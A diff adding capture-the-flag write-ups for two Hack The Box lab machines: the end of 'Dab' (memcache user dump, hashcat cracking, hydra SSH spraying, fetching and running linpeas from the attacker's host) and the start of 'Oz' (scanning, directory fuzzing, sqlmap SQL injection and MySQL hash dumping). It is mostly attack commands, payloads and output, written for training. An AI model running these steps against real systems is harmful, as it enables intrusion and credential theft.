+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . { "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", [...] }
+
+Thing is, you need to log back in to be able to keep reading the users data because after 1 minute the data gets cleared out of memcache. So we're going to save it to a file
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . > users.txt
+
+
+
+Now here we need to get the hashes out of that json file:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json
+ {
+ "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
+ "jackie.abbott": "c6ab361604c4691f78958d6289910d21",
+ "isidro": "e4a4c90483d2ef61de42af1f044087f3",
+ "roy": "afbde995441e19497fe0695e9c539266",
+ "colleen": "d3792794c3143f7e04fd57dc8b085cd4",
+ [...]
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json | jq -r 'to_entries | .[].value' |head -n10
+ 17906b445a05dc42f78ae86a92a57bbd
+ c6ab361604c4691f78958d6289910d21
+ e4a4c90483d2ef61de42af1f044087f3
+ afbde995441e19497fe0695e9c539266
+ d3792794c3143f7e04fd57dc8b085cd4
+ bc5f9b43a0336253ff947a4f8dbdb74f
+ d7505316e9a10fc113126f808663b5a4
+ 71f08b45555acc5259bcefa3af63f4e1
+ 8f61be2ebfc66a5f2496bbf849c89b84
+ 2c22da161f085a9aba62b9bbedbd4ca7
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json | jq -r 'to_entries | .[].value' > hashes
+
+
+
+Once we have the hashes saved into a file, we can use hashcat to crack them, and 12 of them returned:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → hashcat -a 0 -m 0 hashes /usr/share/wordlists/rockyou.txt --force -o cracked
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → hashcat users-hashes --show
+ eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
+ fc7992e8952a8ff5000cb7856d8586d2:Princess1
+ fe01ce2a7fbac8fafaed7c982a04e229:demo
+ 2ac9cb7dc02b3c0083eb70898e549b63:Password1
+ 254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
+ c21f969b5f03d33d43e04f8f136e7682:default
+ 9731e89f01c1fb943cf0baa6772d2875:piggy
+ 0ef9c986fad340989647f0001e3555d4:misfits
+ 5177790ad6df0ea98db41b37b602367c:strength
+ 6f9ff93a26a118b460c878dc30e17130:monkeyman
+ 1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
+ 0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
+
+
+
+So now we have a massive list of users and 12 passwords with only the hashes in common:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json | head -n10
+ {
+ "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
+ "jackie.abbott": "c6ab361604c4691f78958d6289910d21",
+ "isidro": "e4a4c90483d2ef61de42af1f044087f3",
+ "roy": "afbde995441e19497fe0695e9c539266",
+ "colleen": "d3792794c3143f7e04fd57dc8b085cd4",
+ "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f",
+ "asa.christiansen": "d7505316e9a10fc113126f808663b5a4",
+ "jessie": "71f08b45555acc5259bcefa3af63f4e1",
+ "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84",
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user-hashes
+ eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
+ fc7992e8952a8ff5000cb7856d8586d2:Princess1
+ fe01ce2a7fbac8fafaed7c982a04e229:demo
+ 2ac9cb7dc02b3c0083eb70898e549b63:Password1
+ 254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
+ c21f969b5f03d33d43e04f8f136e7682:default
+ 9731e89f01c1fb943cf0baa6772d2875:piggy
+ 0ef9c986fad340989647f0001e3555d4:misfits
+ 5177790ad6df0ea98db41b37b602367c:strength
+ 6f9ff93a26a118b460c878dc30e17130:monkeyman
+ 1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
+ 0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
+ :w
+
+
+
+Since the hash is what these 2 files have in common, we're going to use it to end up with a file that contains 'username:password' so that it can be ran into hydra.
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done
+ "wendell":megadeth
+ "genevieve":Princess1
+ "demo":demo
+ "admin":Password1
+ "d_murphy":hacktheplanet
+ "default":default
+ "abbigail":piggy
+ "aglae":misfits
+ "irma":strength
+ "ona":monkeyman
+ "alec":blaster
+ "rick":lovesucks1
+ :
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done > user_pass
+
+
+
+Then cut out the " characters since hydra doesn't need these (:%s/"//gi , :wq )
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user_pass
+ wendell:megadeth
+ genevieve:Princess1
+ demo:demo
+ admin:Password1
+ d_murphy:hacktheplanet
+ default:default
+ abbigail:piggy
+ aglae:misfits
+ irma:strength
+ ona:monkeyman
+ alec:blaster
+ rick:lovesucks1
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → hydra -C user_pass ssh://10.10.10.86
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-16 14:16:00
+ [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+ [DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
+ [DATA] attacking ssh://10.10.10.86:22/
+ [22][ssh] host: 10.10.10.86 login: genevieve password: Princess1
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-16 14:16:00
+
+
+
+And we found credentials ! genevieve:Princess1 so let's login via ssh:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → ssh genevieve@10.10.10.86
+ The authenticity of host '10.10.10.86 (10.10.10.86)' can't be established.
+ ECDSA key fingerprint is SHA256:3gHAJvc1zomI4M6+oCp/3xrMyS6DMPbMFEGDbBO2Qso.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.86' (ECDSA) to the list of known hosts.
+ genevieve@10.10.10.86's password:
+ Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
+ genevieve@dab:~$ id
+ uid=1000(genevieve) gid=1000(genevieve) groups=1000(genevieve)
+ genevieve@dab:~$ cat user.txt
+ 9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! we managed to find the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now let's enumerate this box from genevieve's POV, to do so we'll use the linpeas script:
+
+
+ genevieve@dab:~$ which wget ; which curl
+ /usr/bin/wget
+ /usr/bin/curl
+
+
+
+Looks like both curl and wget are on the server, this means that we will be able to upload our script onto the server easily, most likely in /tmp or in /dev/shm.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+ --2021-01-16 14:29:02-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.64.133, 151.101.0.133, 151.101.192.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.64.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 319969 (312K) [text/plain]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[============================================================================================>] 312.47K --.-KB/s in 0.09s
+
+ 2021-01-16 14:29:02 (3.36 MB/s) - ‘linpeas.sh’ saved [319969/319969]
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+
+
+ genevieve@dab:/dev/shm$ wget http://10.10.14.16:9090/linpeas.sh
+ --2021-01-16 08:30:02-- http://10.10.14.16:9090/linpeas.sh
+ Connecting to 10.10.14.16:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 319969 (312K) [text/x-sh]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[============================================================================================>] 312.47K 715KB/s in 0.4s
+
+ 2021-01-16 08:30:02 (715 KB/s) - ‘linpeas.sh’ saved [319969/319969]
+
+ genevieve@dab:/dev/shm$ chmod +x linpeas.sh
+ genevieve@dab:/dev/shm$ ./linpeas.sh
+
+
+
+` 
+
+Let it run, and then you can inspect what's interesting, most importantly the /sbin/ldconfig binary has the setuid bit enabled to run as root. ldconfig:
+
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/5 ] [~]
+ → man ldconfig
+
+
+ DESCRIPTION
+ ldconfig creates the necessary links and cache to the most recent shared libraries found in the directories specified on the command line, in the file
+ /etc/ld.so.conf, and in the trusted directories, /lib and /usr/lib (on some 64-bit architectures such as x86-64, /lib and /usr/lib are the trusted directories for
+ 32-bit libraries, while /lib64 and /usr/lib64 are used for 64-bit libraries).
+ The cache is used by the run-time linker, ld.so or ld-linux.so. ldconfig checks the header and filenames of the libraries it encounters when determining which ver‐
+ sions should have their links updated.
+ ldconfig will attempt to deduce the type of ELF libraries (i.e., libc5 or libc6/glibc) based on what C libraries, if any, the library was linked against.
+
+
+
+The second binary we need is located in /usr/bin/myexec:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/13.md b/Hard/13.md
new file mode 100644
index 0000000..fb3e9ed
--- /dev/null
+++ b/Hard/13.md
@@ -0,0 +1,618 @@
+# Oz Writeup
+
+
+
+## Introduction :
+
+Oz is a hard linux box released back in September 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.96 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 8080/tcp on 10.10.10.96
+ Discovered open port 80/tcp on 10.10.10.96
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
+ → nmap -sCV -p 80,8080 10.10.10.96
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 11:52 CET
+ Nmap scan report for 10.10.10.96
+ Host is up (0.041s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
+ |_http-server-header: Werkzeug/0.14.1 Python/2.7.14
+ |_http-title: OZ webapi
+ |_http-trane-info: Problem with XML parsing of /evox/about
+ 8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
+ | http-open-proxy: Potentially OPEN proxy.
+ |_Methods supported:CONNECTION
+ | http-title: GBR Support - Login
+ |_Requested resource was http://10.10.10.96:8080/login
+ |_http-trane-info: Problem with XML parsing of /evox/about
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+The nmap scan hints us towards port 80 and 8080 so let's try to enumerate it:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.96
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/17 11:55:43 Starting gobuster
+ ===============================================================
+ Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96/194ad667-6357-4e67-8b9f-601382c8bc49 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96:8080
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.96:8080
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/01/17 11:55:47 Starting gobuster
+ ===============================================================
+ Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96:8080/d87af5e8-6226-494c-9eeb-8fd9699648b3 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
+
+
+
+Dirbusting won't help us here, so let's view the pages manually:
+
+
+
+Port 8080 gives us a login page, however there doesn't seem to be any sql injections nor can we dirbust it.
+
+
+
+Port 80 gives us a webAPI asking for an username
+
+
+
+As we give different usernames we get a different response, so let's continue from curl:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ %
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing
+ Please register a username!%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing2
+ GSBG0D4LRACK1065VFTSOVAP5C7PCG3TB49PFCF7MEQ6IIR0IO7M4PEMXD36ML42NTDAH4ZSALOZW9OWXT6RJ85I3XE49RA6JDT537SIGV82U5F9DR5X8SAB9WI637PGN4UBZ2K7WTBTSBQGR6Z2ZKWH39MJSFEP3AMSM2XTE9VJPTM9LSNUV7ZPPNWOJBV743Q6NMR5WNHSQ4J6O19E5S0KTFMSUUQO6OA5X2U0GZK0W0P%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing3
+ Please register a username!%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing4
+ DF03OPTMZ596RUG97CSR8KE2ZEP31YP95VEESEDAIT2ZFFVLLG71Q1%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing5
+ Please register a username!%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing6
+ KQAISB6RL5L8VGSR4JWJHE35HA77FUF1L9A1WHD8F1PNEM5MTADE0PZZ42HAIRI6H57U5CBRZGLBPD25G3EP547BMBL3RE7QWFML3879YX2FE20HRU7U5Y40WIWEXQS1H1OYYP62AW86PA6ORH9XFBTC8E6H16TNPBYVDO%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing7
+ 38NQLZG275I1W7SJW67SPMDMR9MXIDWOSZVA6M1R990A0VQXYXVZAPOB07QF0RX9E92HZ2S3XLOV7ST0O6F4TH2710WPCOVX7TXLSUQSYNQMYIUG1W0QIZKYE8MHWCU6HI2OKPSKGXFTQG9QRAI0S4SB5X82UUGSI4N18XEQP4NIBBACYVODBYCGI15NP3AYBVNJMXRN3YN3P7BD8CPLJCY8W8KKVEPVT51BKETON14BTO4M19S2%
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → curl 10.10.10.96/nothing8
+ M8KAGOFMGES8MS9TS3V53ZWRHCFFAA8YVL0MZ86JRJNMJJP9JOGXV3SNUSHKJ4GG0HD7DCN1Y5X43DDE2GB5DA7WV6MWKJO4HGSP5U8WCJ9XWGJVH2B7XL8XKGVUC0FWCZPO1WTQFK49Q3DJG23VPMXEC4NFZ8435VAXDVPDBGFK3DDQFL1V3DWFWSBWTSDQRP943%
+
+
+
+
+
+We can use wfuzz to enumerate the responses from port 80, and exclude the responses that include only 1-4 words:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --hw 1,4 10.10.10.96/FUZZ
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.96/FUZZ
+ Total requests: 87664
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000001: 200 3 L 6 W 75 Ch "# directory-list-2.3-small.txt"
+ 000000003: 200 3 L 6 W 75 Ch "# Copyright 2007 James Fisher"
+ 000000007: 200 3 L 6 W 75 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
+ 000000014: 200 3 L 6 W 75 Ch "http://10.10.10.96/"
+ 000000006: 200 3 L 6 W 75 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
+ 000000011: 200 3 L 6 W 75 Ch "# Priority ordered case sensative list, where entries were found"
+ 000000005: 200 3 L 6 W 75 Ch "# This work is licensed under the Creative Commons"
+ 000000013: 200 3 L 6 W 75 Ch "#"
+ 000000010: 200 3 L 6 W 75 Ch "#"
+ 000000008: 200 3 L 6 W 75 Ch "# or send a letter to Creative Commons, 171 Second Street,"
+ 000000009: 200 3 L 6 W 75 Ch "# Suite 300, San Francisco, California, 94105, USA."
+ 000000012: 200 3 L 6 W 75 Ch "# on atleast 3 different hosts"
+ 000000002: 200 3 L 6 W 75 Ch "#"
+ 000000004: 200 3 L 6 W 75 Ch "#"
+ 000000202: 200 3 L 6 W 79 Ch "users"
+ ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
+
+ Total time: 0
+ Processed Requests: 975
+ Filtered Requests: 960
+ Requests/sec.: 0
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ %
+
+
+From here we get the username register message in bold letters, which means that something is different
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users -v
+ * Trying 10.10.10.96:80...
+ * Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
+ > GET /users HTTP/1.1
+ > Host: 10.10.10.96
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 200 OK
+ < Content-Type: text/html; charset=utf-8
+ < Content-Length: 79
+ < Server: Werkzeug/0.14.1 Python/2.7.14
+ < Date: Thu, 21 Jan 2021 13:44:46 GMT
+ <
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ * Closing connection 0
+ %
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users/ -v
+ * Trying 10.10.10.96:80...
+ * Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
+ > GET /users/ HTTP/1.1
+ > Host: 10.10.10.96
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 200 OK
+ < Content-Type: text/html; charset=utf-8
+ < Content-Length: 89
+ < Server: Werkzeug/0.14.1 Python/2.7.14
+ < Date: Thu, 21 Jan 2021 13:44:49 GMT
+ <
+
+ OZ webapi
+
+
+ ### Please register a username!
+
+
+ * Closing connection 0
+ %
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → curl 10.10.10.96/users/"'" -v
+ * Trying 10.10.10.96:80...
+ * Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
+ > GET /users/' HTTP/1.1
+ > Host: 10.10.10.96
+ > User-Agent: curl/7.74.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ * HTTP 1.0, assume close after body
+ < HTTP/1.0 500 INTERNAL SERVER ERROR
+ < Content-Type: text/html
+ < Content-Length: 291
+ < Server: Werkzeug/0.14.1 Python/2.7.14
+ < Date: Thu, 21 Jan 2021 13:44:53 GMT
+ <
+
+ 500 Internal Server Error
+
+
+ # Internal Server Error
+
+
+
+
+ The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
+
+
+ * Closing connection 0
+
+
+
+After enumerating that url we see something weird, putting ' after the url returns an internal server error with code 500. This is probably a SQL injection so let's verify that:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --batch
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 14:42:40 /2021-01-21/
+
+ [14:42:40] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
+ do you want to try URI injections in the target URL itself? [Y/n/q] Y
+ [14:42:40] [INFO] testing connection to the target URL
+ [14:42:40] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [14:42:40] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
+ are you sure that you want to continue with further target testing? [Y/n] Y
+ [14:42:40] [WARNING] please consider usage of tamper scripts (option '--tamper')
+ [14:42:40] [INFO] testing if the target URL content is stable
+ [14:42:41] [INFO] target URL content is stable
+ [14:42:41] [INFO] testing if URI parameter '#1*' is dynamic
+ [14:42:41] [INFO] URI parameter '#1*' appears to be dynamic
+ [14:42:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
+ [14:42:41] [INFO] testing for SQL injection on URI parameter '#1*'
+ [14:42:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [14:42:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
+ [14:42:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
+ [14:42:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
+ [14:42:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
+ [14:42:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
+ [14:42:45] [INFO] testing 'Generic inline queries'
+ [14:42:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
+ [14:42:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
+ [14:42:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
+ [14:42:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
+ [14:42:58] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
+ it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+ for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
+ [14:42:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+ [14:42:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+ [14:43:01] [INFO] target URL appears to be UNION injectable with 1 columns
+ [14:43:01] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
+ URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+ sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
+ ---
+ Parameter: #1* (URI)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: http://10.10.10.96:80/users/' AND (SELECT 5564 FROM (SELECT(SLEEP(5)))XXXV) AND 'JCgZ'='JCgZ
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 1 column
+ Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(0x716b6a6a71,0x4c53726344695a75686c4c714a766e4e56545a5a4b4c61655457764361447776536a684645747a54,0x716a767071)-- -
+ ---
+ [14:43:01] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+ [14:43:01] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 40 times
+ [14:43:01] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:43:01 /2021-01-21/
+
+
+
+
+And here we see that the URL parameter is vulnerable, so let's enumerate it further to get the databases available:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --dbs --batch
+
+ available databases [4]:
+ [*] information_schema
+ [*] mysql
+ [*] ozdb
+ [*] performance_schema
+
+ [14:44:45] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 1 times
+ [14:44:45] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
+
+ [*] ending @ 14:44:45 /2021-01-21/
+
+
+
+Now let's enumerate annd see if we can find password hashes:
+
+
+
+ [ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
+ → sqlmap -u http://10.10.10.96/users/ --passwords --batch
+
+ ---
+ [14:45:17] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+ [14:45:17] [INFO] fetching database users password hashes
+ [14:45:18] [INFO] retrieved: 'root',''
+ [14:45:18] [INFO] retrieved: 'dorthi',''
+ [14:45:18] [INFO] retrieved: 'root',''
+ [14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
+ [14:45:18] [INFO] retrieved: 'dorthi','*43AE542A63D9C43FF9D40D0280CFDA58F6C747CA'
+ [14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
+ do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
+ do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
+ [14:45:19] [INFO] using hash method 'mysql_passwd'
+ what dictionary do you want to use?
+ [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
+ [2] custom dictionary file
+ [3] file with list of dictionary files
+ > 1
+ [14:45:19] [INFO] using default dictionary
+ do you want to use common password suffixes? (slow!) [y/N] N
+ [14:45:19] [INFO] starting dictionary-based cracking (mysql_passwd)
+ [14:45:19] [INFO] starting 3 processes
+ [14:45:31] [WARNING] no clear password(s) found
+ database management system users password hashes:
+ [*] dorthi [1]:
+ password hash: *43AE542A63D9C43FF9D40D0280CFDA58F6C747CA
+ [*] root [1]:
+ password hash: *61A2BD98DAD2A09749B6FC77A9578609D32518DD
+
+ [14:45:31] [WARNING] HTTP error codes detected during run:
+ 500 (Internal Server Error) - 2 times
